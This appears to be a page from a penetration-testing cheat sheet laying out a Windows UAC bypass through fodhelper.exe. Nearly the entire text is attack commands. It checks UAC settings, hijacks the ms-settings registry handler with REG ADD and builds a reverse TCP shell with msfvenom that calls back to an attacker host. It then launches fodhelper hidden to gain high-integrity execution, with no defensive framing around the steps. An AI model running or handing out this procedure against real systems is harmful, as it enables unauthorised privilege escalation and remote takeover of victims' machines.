UAC Bypass

User Account Control - The effect of UAC is that any application that wishes to perform an operation with a potential system-wide impact, cannot do so silently. This one is UAC Bypass - Fodhelper.exe.

# Check which level - if medium level integrity shell
whoami /groups

where fodhelper.exe # Find the location of fodhelper.exe on the system

Exploitation

# This can directly give high-level integrity sometimes, one-time wonder. if works, works.
powershell.exe Start-Process cmd.exe -Verb runAs

Fodhelper.exe Bypass

# To see if UAC is enabled
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA

# To see which level is configured
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin

# Check for Medium Mandatory Level
whoami /groups | findstr Level

# Search for fodhelper.exe always
where /r C:\\windows fodhelper.exe

# Run this to check Powershell x86 or x64
powershell [Environment]::Is64BitProcess
# If False
C:\Windows\sysnative\cmd.exe

# Just Type these commands
REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command
# The operation was completed successfully. # YES
REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ

# Generate shell64.exe with msfvenom [see if it's 64bit process]
SHELL NAME SHOULD BE THE FODHELPER.exe or whatever .exe is running.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<port> -f exe > <shell-x64.exe>
REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /d "C:\Users\viewer\Desktop\fodhelper.exe" /f

# Execute Folhelper.exe again (Try each of those if one doesn't work)
# CHANGE NOTHING HERE, just the path try
C:\Windows\Sysnative\cmd.exe /c "powershell Start-Process C:\Windows\System32\fodhelper.exe -WindowStyle Hidden"
cmd.exe /c "powershell Start-Process C:\Windows\System32\fodhelper.exe -WindowStyle Hidden"

C:\Windows\Sysnative\cmd.exe /c "powershell Start-Process C:\Windows\SysWOW64\fodhelper.exe -WindowStyle Hidden"
cmd.exe /c "powershell Start-Process C:\Windows\SysWOW64\fodhelper.exe -WindowStyle Hidden"
PreviousWindows SubsystemNext.ODT - Htdocs

Last updated